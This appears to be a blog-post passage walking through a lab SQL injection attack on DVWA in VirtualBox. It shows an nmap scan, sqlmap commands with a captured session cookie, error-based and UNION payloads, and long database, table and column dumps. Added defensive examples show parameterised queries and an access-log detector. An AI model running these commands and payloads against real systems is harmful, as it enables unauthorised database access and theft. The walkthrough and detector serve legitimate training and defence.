Saturday, March 22, 2014

METASPLOIT DVWA GNU LINUX IN VIRTUALBOX



root@bt:/pentest/database/sqlmap# nmap 192.168.56.101

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-10-26 21:54 WIT
Nmap scan report for 192.168.56.101
Host is up (0.00046s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown


Once the scan is complete, continue by enumerating the databases with a command like the following, built from two values:
=>http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#
the DVWA address shown in the browser, as noted earlier
=>security=low; PHPSESSID=cf4edd7579db6af1cf7634bd4cebe7ab
the cookie captured in the Burp Suite proxy, as noted earlier

When prompted, select 1 ([1] Follow the redirection, the default) to list all the databases.


root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=cf4edd7579db6af1cf7634bd4cebe7ab" --dbs

    sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 03:46:43

[03:46:43] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[03:46:43] [INFO] resuming injection data from session file
[03:46:43] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[03:46:43] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=' AND (SELECT 6653 FROM(SELECT COUNT(*),CONCAT(0x3a6b6b6d3a,(SELECT (CASE WHEN (6653=6653) THEN 1 ELSE 0 END)),0x3a7462743a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'vtwl'='vtwl&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=' UNION ALL SELECT NULL, CONCAT(0x3a6b6b6d3a,0x6f634747594641726370,0x3a7462743a)# AND 'TOOF'='TOOF&Submit=Submit
---

[03:46:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[03:46:43] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] metasploit
[*] mysql
[*] owasp10
[*] tikiwiki
[*] tikiwiki195

[03:46:43] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'

[*] shutting down at 03:46:43
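
Why the id parameter is injectable, and what closes the hole, as an added example that is not part of the original post or of DVWA's own code: the "low" DVWA page builds its query by splicing the request parameter into the SQL text, while the hardened version binds the value as a parameter. The example uses Python with an in-memory SQLite table of constructed rows; because SQLite has no MySQL-style `#` comment, the UNION payload shape reported above is adapted to end with `-- `, and the table contents and function names are assumptions made for the demo.

```python
import sqlite3

# Constructed sample data shaped like DVWA's users table (first_name/last_name
# keyed by user_id). These rows are made up for the demo.
SAMPLE_ROWS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Pablo", "Picasso"),
]

# The UNION payload shape sqlmap reported for the id parameter. SQLite has no
# '#' line comment, so the trailing junk is neutralised with '-- ' instead
# (an adaptation for this demo; MySQL accepts both comment styles).
UNION_PAYLOAD = "' UNION ALL SELECT NULL, 'injected' -- AND 'TOOF'='TOOF"


def open_sample_db():
    """Create an in-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, user_id):
    """DVWA 'low' pattern: the request parameter is spliced into the SQL text,
    so a quote in the value ends the literal and the rest is parsed as SQL."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_hardened(conn, user_id):
    """Parameterised query: the value is bound by the driver and can only ever
    be compared as data, never interpreted as SQL."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_id,)).fetchall()


if __name__ == "__main__":
    db = open_sample_db()
    for label, fn in (("vulnerable", lookup_vulnerable), ("hardened", lookup_hardened)):
        print(label, "id=1       ->", fn(db, "1"))
        print(label, "id=payload ->", fn(db, UNION_PAYLOAD))
```

With a normal id both functions return the same row; with the payload the vulnerable query returns an attacker-chosen row (which is exactly what sqlmap's UNION technique reads data through), whereas the bound query simply finds no user whose id equals the payload string. Binding parameters, not escaping or filtering, is the fix that makes the whole class of payloads above inert.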

Continue with the command below to find out which tables the database contains; again select 1 ([1] Follow the redirection, the default) to list all the tables:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=cf4edd7579db6af1cf7634bd4cebe7ab" -D tikiwiki --tables

    sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 03:51:21

[03:51:22] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[03:51:22] [INFO] resuming injection data from session file
[03:51:22] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[03:51:22] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=' AND (SELECT 6653 FROM(SELECT COUNT(*),CONCAT(0x3a6b6b6d3a,(SELECT (CASE WHEN (6653=6653) THEN 1 ELSE 0 END)),0x3a7462743a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'vtwl'='vtwl&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=' UNION ALL SELECT NULL, CONCAT(0x3a6b6b6d3a,0x6f634747594641726370,0x3a7462743a)# AND 'TOOF'='TOOF&Submit=Submit
---

[03:51:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[03:51:22] [INFO] fetching tables for database: tikiwiki
Database: tikiwiki
[194 tables]
+------------------------------------+
| galaxia_activities                 |
| galaxia_activity_roles             |
| galaxia_instance_activities        |
| galaxia_instance_comments          |
| galaxia_instances                  |
| galaxia_processes                  |
| galaxia_roles                      |
| galaxia_transitions                |
| galaxia_user_roles                 |
| galaxia_workitems                  |
| messu_archive                      |
| messu_messages                     |
| messu_sent                         |
| sessions                           |
| tiki_actionlog                     |
| tiki_article_types                 |
| tiki_articles                      |
| tiki_banners                       |
| tiki_banning                       |
| tiki_banning_sections              |
| tiki_blog_activity                 |
| tiki_blog_posts                    |
| tiki_blog_posts_images             |
| tiki_blogs                         |
| tiki_calendar_categories           |
| tiki_calendar_items                |
| tiki_calendar_locations            |
| tiki_calendar_roles                |
| tiki_calendars                     |
| tiki_categories                    |
| tiki_categorized_objects           |
| tiki_category_objects              |
| tiki_category_sites                |
| tiki_chart_items                   |
| tiki_charts                        |
| tiki_charts_rankings               |
| tiki_charts_votes                  |
| tiki_chat_channels                 |
| tiki_chat_messages                 |
| tiki_chat_users                    |
| tiki_comments                      |
| tiki_content                       |
| tiki_content_templates             |
| tiki_content_templates_sections    |
| tiki_cookies                       |
| tiki_copyrights                    |
| tiki_directory_categories          |
| tiki_directory_search              |
| tiki_directory_sites               |
| tiki_download                      |
| tiki_drawings                      |
| tiki_dsn                           |
| tiki_dynamic_variables             |
| tiki_eph                           |
| tiki_extwiki                       |
| tiki_faq_questions                 |
| tiki_faqs                          |
| tiki_featured_links                |
| tiki_file_galleries                |
| tiki_file_handlers                 |
| tiki_files                         |
| tiki_forum_attachments             |
| tiki_forum_reads                   |
| tiki_forums                        |
| tiki_forums_queue                  |
| tiki_forums_reported               |
| tiki_friends                       |
| tiki_friendship_requests           |
| tiki_galleries                     |
| tiki_galleries_scales              |
| tiki_games                         |
| tiki_group_inclusion               |
| tiki_history                       |
| tiki_hotwords                      |
| tiki_html_pages                    |
| tiki_html_pages_dynamic_zones      |
| tiki_images                        |
| tiki_images_data                   |
| tiki_integrator_reps               |
| tiki_integrator_rules              |
| tiki_language                      |
| tiki_languages                     |
| tiki_link_cache                    |
| tiki_links                         |
| tiki_live_support_events           |
| tiki_live_support_message_comments |
| tiki_live_support_messages         |
| tiki_live_support_modules          |
| tiki_live_support_operators        |
| tiki_live_support_requests         |
| tiki_logs                          |
| tiki_mail_events                   |
| tiki_mailin_accounts               |
| tiki_menu_languages                |
| tiki_menu_options                  |
| tiki_menus                         |
| tiki_minical_events                |
| tiki_minical_topics                |
| tiki_modules                       |
| tiki_newsletter_groups             |
| tiki_newsletter_subscriptions      |
| tiki_newsletters                   |
| tiki_newsreader_marks              |
| tiki_newsreader_servers            |
| tiki_object_ratings                |
| tiki_page_footnotes                |
| tiki_pages                         |
| tiki_pageviews                     |
| tiki_poll_objects                  |
| tiki_poll_options                  |
| tiki_polls                         |
| tiki_preferences                   |
| tiki_private_messages              |
| tiki_programmed_content            |
| tiki_quicktags                     |
| tiki_quiz_question_options         |
| tiki_quiz_questions                |
| tiki_quiz_results                  |
| tiki_quiz_stats                    |
| tiki_quiz_stats_sum                |
| tiki_quizzes                       |
| tiki_received_articles             |
| tiki_received_pages                |
| tiki_referer_stats                 |
| tiki_related_categories            |
| tiki_rss_feeds                     |
| tiki_rss_modules                   |
| tiki_score                         |
| tiki_search_stats                  |
| tiki_searchindex                   |
| tiki_searchsyllable                |
| tiki_searchwords                   |
| tiki_secdb                         |
| tiki_semaphores                    |
| tiki_sent_newsletters              |
| tiki_sessions                      |
| tiki_sheet_layout                  |
| tiki_sheet_values                  |
| tiki_sheets                        |
| tiki_shoutbox                      |
| tiki_shoutbox_words                |
| tiki_stats                         |
| tiki_structure_versions            |
| tiki_structures                    |
| tiki_submissions                   |
| tiki_suggested_faq_questions       |
| tiki_survey_question_options       |
| tiki_survey_questions              |
| tiki_surveys                       |
| tiki_tags                          |
| tiki_theme_control_categs          |
| tiki_theme_control_objects         |
| tiki_theme_control_sections        |
| tiki_topics                        |
| tiki_tracker_fields                |
| tiki_tracker_item_attachments      |
| tiki_tracker_item_comments         |
| tiki_tracker_item_fields           |
| tiki_tracker_items                 |
| tiki_tracker_options               |
| tiki_trackers                      |
| tiki_translated_objects            |
| tiki_untranslated                  |
| tiki_user_answers                  |
| tiki_user_answers_uploads          |
| tiki_user_assigned_modules         |
| tiki_user_bookmarks_folders        |
| tiki_user_bookmarks_urls           |
| tiki_user_mail_accounts            |
| tiki_user_menus                    |
| tiki_user_modules                  |
| tiki_user_notes                    |
| tiki_user_postings                 |
| tiki_user_preferences              |
| tiki_user_quizzes                  |
| tiki_user_taken_quizzes            |
| tiki_user_tasks                    |
| tiki_user_tasks_history            |
| tiki_user_votings                  |
| tiki_user_watches                  |
| tiki_userfiles                     |
| tiki_userpoints                    |
| tiki_users                         |
| tiki_users_score                   |
| tiki_webmail_contacts              |
| tiki_webmail_messages              |
| tiki_wiki_attachments              |
| tiki_zones                         |
| users_grouppermissions             |
| users_groups                       |
| users_objectpermissions            |
| users_permissions                  |
| users_usergroups                   |
| users_users                        |
+------------------------------------+

[03:51:22] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'
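
Seen from the web server side, the two payloads sqlmap reported leave characteristic traces in the access log. The following detector is an added example (not from the original post or from sqlmap) that parses combined-format log lines, URL-decodes the query parameters and flags the constructs visible in the payloads above. The log lines are constructed inside the code, the indicator regexes are my own choices, and the sqlmap User-Agent string used in the sample is assumed rather than copied from the tool.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# The two injection payloads sqlmap reported for the id parameter (copied from
# the output above) - used here only to build constructed log lines.
PAGE_PAYLOADS = {
    "error-based": (
        "' AND (SELECT 6653 FROM(SELECT COUNT(*),CONCAT(0x3a6b6b6d3a,"
        "(SELECT (CASE WHEN (6653=6653) THEN 1 ELSE 0 END)),0x3a7462743a,"
        "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
        " AND 'vtwl'='vtwl"
    ),
    "union": (
        "' UNION ALL SELECT NULL, CONCAT(0x3a6b6b6d3a,0x6f634747594641726370,"
        "0x3a7462743a)# AND 'TOOF'='TOOF"
    ),
}

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Indicator patterns (my own choices, not from the page): each one targets a
# construct visible in the payloads above rather than generic SQL keywords.
INDICATORS = [
    ("union-select", re.compile(r"\bunion\b.{0,20}\bselect\b", re.I)),
    ("information_schema", re.compile(r"information_schema", re.I)),
    ("hex-concat", re.compile(r"concat\s*\(\s*0x[0-9a-f]+", re.I)),
    ("floor-rand-error-based", re.compile(r"floor\s*\(\s*rand\s*\(", re.I)),
    ("quote-tautology", re.compile(r"\b(and|or)\b\s*'[^']*'\s*=\s*'", re.I)),
]


def inspect_line(line):
    """Parse one log line; return a finding dict (possibly with no indicators)
    or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    parts = urlsplit(m.group("target"))
    params = parse_qs(parts.query, keep_blank_values=True)  # URL-decodes values
    hits = set()
    for name, values in params.items():
        for value in values:
            for label, rx in INDICATORS:
                if rx.search(value):
                    hits.add(f"{label} in {name}")
    if "sqlmap" in m.group("ua").lower():
        hits.add("sqlmap user-agent")
    return {"ip": m.group("ip"), "path": parts.path, "indicators": sorted(hits)}


def scan(lines):
    """Return findings only for lines that tripped at least one indicator."""
    findings = (inspect_line(line) for line in lines)
    return [f for f in findings if f and f["indicators"]]


def build_line(ip, id_value, ua):
    """Construct a combined-format log line for the DVWA sqli page (demo data)."""
    target = "/dvwa/vulnerabilities/sqli/?id=" + quote(id_value, safe="") + "&Submit=Submit"
    return f'{ip} - - [26/Oct/2012:21:58:01 +0700] "GET {target} HTTP/1.1" 200 4521 "-" "{ua}"'


# Constructed sample log: one benign request and the two sqlmap payloads.
SAMPLE_LOG = [
    build_line("192.168.56.1", "1", "Mozilla/5.0"),
    build_line("192.168.56.1", PAGE_PAYLOADS["error-based"], "sqlmap/1.0-dev (http://www.sqlmap.org)"),
    build_line("192.168.56.1", PAGE_PAYLOADS["union"], "sqlmap/1.0-dev (http://www.sqlmap.org)"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["ip"], finding["path"], ", ".join(finding["indicators"]))
```

Run it as is to see the two payload requests flagged and the benign `id=1` request ignored; on a real server, replace SAMPLE_LOG with lines read from the access log. The User-Agent check is the weakest signal (sqlmap can be told to send any string), which is why the decoded-parameter indicators carry the detection; note also that the "0 HTTP(s) requests" in the runs above is because sqlmap resumed from its session file, so a log review should look for the earlier detection run, not just these later enumeration runs.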

Now we proceed to dump the columns: here we want to see the columns of the tables in tikiwiki. Follow the same steps as before; see the following:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=cf4edd7579db6af1cf7634bd4cebe7ab" -D tikiwiki --columns


| name        | varchar(30)  |
| refresh     | int(6)       |
+-------------+--------------+

Database: tikiwiki
Table: tiki_galleries_scales
[2 columns]
+-----------+---------+
| Column    | Type    |
+-----------+---------+
| galleryId | int(14) |
| scale     | int(11) |
+-----------+---------+

Database: tikiwiki
Table: sessions
[4 columns]
+-----------+------------------+
| Column    | Type             |
+-----------+------------------+
| data      | text             |
| expireref | varchar(64)      |
| expiry    | int(11) unsigned |
| sesskey   | char(32)         |
+-----------+------------------+

Database: tikiwiki
Table: tiki_quiz_stats_sum
[6 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| avgavg     | decimal(5,2) |
| avgpoints  | decimal(5,2) |
| avgtime    | decimal(5,2) |
| quizId     | int(10)      |
| quizName   | varchar(255) |
| timesTaken | int(10)      |
+------------+--------------+

Database: tikiwiki
Table: tiki_charts_votes
[4 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| chartId   | int(14)     |
| itemId    | int(14)     |
| timestamp | int(14)     |
| user      | varchar(40) |
+-----------+-------------+

Database: tikiwiki
Table: tiki_newsletters
[12 columns]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| allowAnySub  | char(1)      |
| allowUserSub | char(1)      |
| created      | int(14)      |
| description  | text         |
| editions     | int(10)      |
| frequency    | int(14)      |
| lastSent     | int(14)      |
| name         | varchar(200) |
| nlId         | int(12)      |
| unsubMsg     | char(1)      |
| users        | int(10)      |
| validateAddr | char(1)      |
+--------------+--------------+

Database: tikiwiki
Table: tiki_webmail_contacts
[6 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| contactId | int(12)      |
| email     | varchar(250) |
| firstName | varchar(80)  |
| lastName  | varchar(80)  |
| nickname  | varchar(200) |
| user      | varchar(40)  |
+-----------+--------------+

Database: tikiwiki
Table: tiki_programmed_content
[4 columns]
+-------------+---------+
| Column      | Type    |
+-------------+---------+
| contentId   | int(8)  |
| data        | text    |
| pId         | int(8)  |
| publishDate | int(14) |
+-------------+---------+

Database: tikiwiki
Table: tiki_searchsyllable
[3 columns]
+-------------+-------------+
| Column      | Type        |
+-------------+-------------+
| lastUpdated | int(11)     |
| lastUsed    | int(11)     |
| syllable    | varchar(80) |
+-------------+-------------+

Database: tikiwiki
Table: tiki_category_sites
[2 columns]
+---------+---------+
| Column  | Type    |
+---------+---------+
| categId | int(10) |
| siteId  | int(14) |
+---------+---------+

Database: tikiwiki
Table: tiki_zones
[1 column]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| zone   | varchar(40) |
+--------+-------------+

Database: tikiwiki
Table: tiki_faqs
[7 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| canSuggest  | char(1)      |
| created     | int(14)      |
| description | text         |
| faqId       | int(10)      |
| hits        | int(8)       |
| questions   | int(5)       |
| title       | varchar(200) |
+-------------+--------------+

Database: tikiwiki
Table: tiki_chart_items
[9 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| average     | decimal(4,2) |
| chartId     | int(14)      |
| created     | int(14)      |
| description | text         |
| itemId      | int(14)      |
| points      | int(14)      |
| title       | varchar(250) |
| URL         | varchar(250) |
| votes       | int(14)      |
+-------------+--------------+

Database: tikiwiki
Table: tiki_user_preferences
[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| prefName | varchar(40)  |
| user     | varchar(40)  |
| value    | varchar(250) |
+----------+--------------+

Database: tikiwiki
Table: tiki_surveys
[7 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| created     | int(14)      |
| description | text         |
| lastTaken   | int(14)      |
| name        | varchar(200) |
| status      | char(1)      |
| surveyId    | int(12)      |
| taken       | int(10)      |
+-------------+--------------+

Database: tikiwiki
Table: tiki_theme_control_objects
[4 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| name   | varchar(250) |
| objId  | varchar(250) |
| theme  | varchar(250) |
| type   | varchar(250) |
+--------+--------------+

Database: tikiwiki
Table: messu_sent
[15 columns]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| body         | text         |
| date         | int(14)      |
| hash         | varchar(32)  |
| isFlagged    | char(1)      |
| isRead       | char(1)      |
| isReplied    | char(1)      |
| msgId        | int(14)      |
| priority     | int(2)       |
| replyto_hash | varchar(32)  |
| subject      | varchar(255) |
| user         | varchar(40)  |
| user_bcc     | text         |
| user_cc      | text         |
| user_from    | varchar(40)  |
| user_to      | text         |
+--------------+--------------+

Database: tikiwiki
Table: tiki_untranslated
[3 columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| id     | int(14)  |
| lang   | char(16) |
| source | tinyblob |
+--------+----------+

Database: tikiwiki
Table: tiki_search_stats
[2 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| hits   | int(10)     |
| term   | varchar(50) |
+--------+-------------+

Database: tikiwiki
Table: tiki_dsn
[3 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| dsn    | varchar(255) |
| dsnId  | int(12)      |
| name   | varchar(200) |
+--------+--------------+

Database: tikiwiki
Table: tiki_banning
[13 columns]
+-----------+-------------------+
| Column    | Type              |
+-----------+-------------------+
| banId     | int(12)           |
| created   | int(14)           |
| date_from | timestamp         |
| date_to   | timestamp         |
| ip1       | char(3)           |
| ip2       | char(3)           |
| ip3       | char(3)           |
| ip4       | char(3)           |
| message   | text              |
| mode      | enum('user','ip') |
| title     | varchar(200)      |
| use_dates | char(1)           |
| user      | varchar(40)       |
+-----------+-------------------+

Database: tikiwiki
Table: tiki_preferences
[2 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| name   | varchar(40) |
| value  | text        |
+--------+-------------+

Database: tikiwiki
Table: tiki_comments
[20 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| average        | decimal(8,4) |
| comment_rating | tinyint(2)   |
| commentDate    | int(14)      |
| data           | text         |
| hash           | varchar(32)  |
| hits           | int(8)       |
| in_reply_to    | varchar(250) |
| message_id     | varchar(250) |
| object         | varchar(255) |
| objectType     | varchar(32)  |
| parentId       | int(14)      |
| points         | decimal(8,2) |
| smiley         | varchar(80)  |
| summary        | varchar(240) |
| threadId       | int(14)      |
| title          | varchar(100) |
| type           | char(1)      |
| user_ip        | varchar(15)  |
| userName       | varchar(40)  |
| votes          | int(8)       |
+----------------+--------------+

Database: tikiwiki
Table: tiki_received_pages
[8 columns]
+------------------+--------------+
| Column           | Type         |
+------------------+--------------+
| comment          | varchar(200) |
| data             | longblob     |
| description      | varchar(200) |
| pageName         | varchar(160) |
| receivedDate     | int(14)      |
| receivedFromSite | varchar(200) |
| receivedFromUser | varchar(200) |
| receivedPageId   | int(14)      |
+------------------+--------------+

Database: tikiwiki
Table: tiki_extwiki
[3 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| extwiki   | varchar(255) |
| extwikiId | int(12)      |
| name      | varchar(200) |
+-----------+--------------+

Database: tikiwiki
Table: tiki_rss_modules
[9 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| content     | longblob     |
| description | text         |
| lastUpdated | int(14)      |
| name        | varchar(30)  |
| refresh     | int(8)       |
| rssId       | int(8)       |
| showPubDate | char(1)      |
| showTitle   | char(1)      |
| url         | varchar(255) |
+-------------+--------------+

Database: tikiwiki
Table: tiki_calendars
[13 columns]
+--------------------+---------------+
| Column             | Type          |
+--------------------+---------------+
| calendarId         | int(14)       |
| created            | int(14)       |
| customcategories   | enum('n','y') |
| customlanguages    | enum('n','y') |
| customlocations    | enum('n','y') |
| customparticipants | enum('n','y') |
| custompriorities   | enum('n','y') |
| customsubscription | enum('n','y') |
| description        | varchar(255)  |
| lastmodif          | int(14)       |
| name               | varchar(80)   |
| personal           | enum('n','y') |
| user               | varchar(40)   |
+--------------------+---------------+

Database: tikiwiki
Table: tiki_live_support_events
[7 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| data      | text        |
| eventId   | int(14)     |
| reqId     | varchar(32) |
| senderId  | varchar(32) |
| seqId     | int(14)     |
| timestamp | int(14)     |
| type      | varchar(40) |
+-----------+-------------+

Database: tikiwiki
Table: tiki_blog_posts_images
[6 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| data     | longblob    |
| filename | varchar(80) |
| filesize | int(14)     |
| filetype | varchar(80) |
| imgId    | int(14)     |
| postId   | int(14)     |
+----------+-------------+

Database: tikiwiki
Table: tiki_pages
[23 columns]
+-----------------+------------------+
| Column          | Type             |
+-----------------+------------------+
| cache           | longtext         |
| cache_timestamp | int(14)          |
| comment         | varchar(200)     |
| created         | int(14)          |
| creator         | varchar(200)     |
| data            | text             |
| description     | varchar(200)     |
| flag            | char(1)          |
| hits            | int(8)           |
| ip              | varchar(15)      |
| is_html         | tinyint(1)       |
| lang            | varchar(16)      |
| lastModif       | int(14)          |
| lockedby        | varchar(200)     |
| page_id         | int(14)          |
| page_size       | int(10) unsigned |
| pageName        | varchar(160)     |
| pageRank        | decimal(4,3)     |
| points          | int(8)           |
| user            | varchar(40)      |
| version         | int(8)           |
| votes           | int(8)           |
| wiki_cache      | int(10)          |
+-----------------+------------------+

Database: tikiwiki
Table: tiki_poll_objects
[3 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| catObjectId | int(11)      |
| pollId      | int(11)      |
| title       | varchar(255) |
+-------------+--------------+

Database: tikiwiki
Table: tiki_forum_attachments
[11 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| attId    | int(14)      |
| created  | int(14)      |
| data     | longblob     |
| dir      | varchar(200) |
| filename | varchar(250) |
| filesize | int(12)      |
| filetype | varchar(250) |
| forumId  | int(14)      |
| path     | varchar(250) |
| qId      | int(14)      |
| threadId | int(14)      |
+----------+--------------+

Database: tikiwiki
Table: tiki_categories
[5 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| categId     | int(12)      |
| description | varchar(250) |
| hits        | int(8)       |
| name        | varchar(100) |
| parentId    | int(12)      |
+-------------+--------------+

Database: tikiwiki
Table: tiki_quizzes
[37 columns]
+------------------------+--------------+
| Column                 | Type         |
+------------------------+--------------+
| bAdditionalQuestions   | char(1)      |
| bDeleted               | char(1)      |
| bForum                 | char(1)      |
| bLimitQuestionsPerPage | char(1)      |
| bMultiSession          | char(1)      |
| bOnline                | char(1)      |
| bRandomQuestions       | char(1)      |
| canRepeat              | char(1)      |
| created                | int(14)      |
| description            | text         |
| expireDate             | int(14)      |
| immediateFeedback      | char(1)      |
| name                   | varchar(255) |
| nAuthor                | int(4)       |
| nCanRepeat             | tinyint(4)   |
| nLimitQuestionsPerPage | tinyint(4)   |
| nRandomQuestions       | tinyint(4)   |
| nVersion               | int(4)       |
| passingperct           | int(4)       |
| publishDate            | int(14)      |
| questionsPerPage       | int(4)       |
| quizId                 | int(10)      |
| sData                  | text         |
| sEpilogue              | text         |
| sForum                 | varchar(80)  |
| sGradingMethod         | varchar(80)  |
| showAnswers            | char(1)      |
| shuffleAnswers         | char(1)      |
| shuffleQuestions       | char(1)      |
| sPrologue              | text         |
| sPublishStats          | varchar(80)  |
| sShowCorrectAnswers    | varchar(80)  |
| sShowScore             | varchar(80)  |
| storeResults           | char(1)      |
| taken                  | int(10)      |
| timeLimit              | int(14)      |
| timeLimited            | char(1)      |
+------------------------+--------------+

Database: tikiwiki
Table: tiki_userpoints
[3 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| points | decimal(8,2) |
| user   | varchar(40)  |
| voted  | int(8)       |
+--------+--------------+

Database: tikiwiki
Table: tiki_user_answers
[4 columns]
+--------------+---------+
| Column       | Type    |
+--------------+---------+
| optionId     | int(10) |
| questionId   | int(10) |
| quizId       | int(10) |
| userResultId | int(10) |
+--------------+---------+

Database: tikiwiki
Table: tiki_suggested_faq_questions
[6 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| answer   | text        |
| created  | int(14)     |
| faqId    | int(10)     |
| question | text        |
| sfqId    | int(10)     |
| user     | varchar(40) |
+----------+-------------+

Database: tikiwiki
Table: tiki_integrator_reps
[9 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| cacheable   | char(1)      |
| css_file    | varchar(255) |
| description | text         |
| expiration  | int(11)      |
| name        | varchar(255) |
| path        | varchar(255) |
| repID       | int(11)      |
| start_page  | varchar(255) |
| visibility  | char(1)      |
+-------------+--------------+

Database: tikiwiki
Table: tiki_html_pages_dynamic_zones
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| content  | text        |
| pageName | varchar(40) |
| type     | char(2)     |
| zone     | varchar(80) |
+----------+-------------+

Database: tikiwiki
Table: tiki_minical_topics
[9 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| data     | longblob     |
| filename | varchar(200) |
| filesize | varchar(200) |
| filetype | varchar(200) |
| isIcon   | char(1)      |
| name     | varchar(250) |
| path     | varchar(250) |
| topicId  | int(12)      |
| user     | varchar(40)  |
+----------+--------------+

Database: tikiwiki
Table: tiki_banners
[29 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| alt            | varchar(250) |
| bannerId       | int(12)      |
| clicks         | int(8)       |
| client         | varchar(200) |
| created        | int(14)      |
| fixedURLData   | varchar(255) |
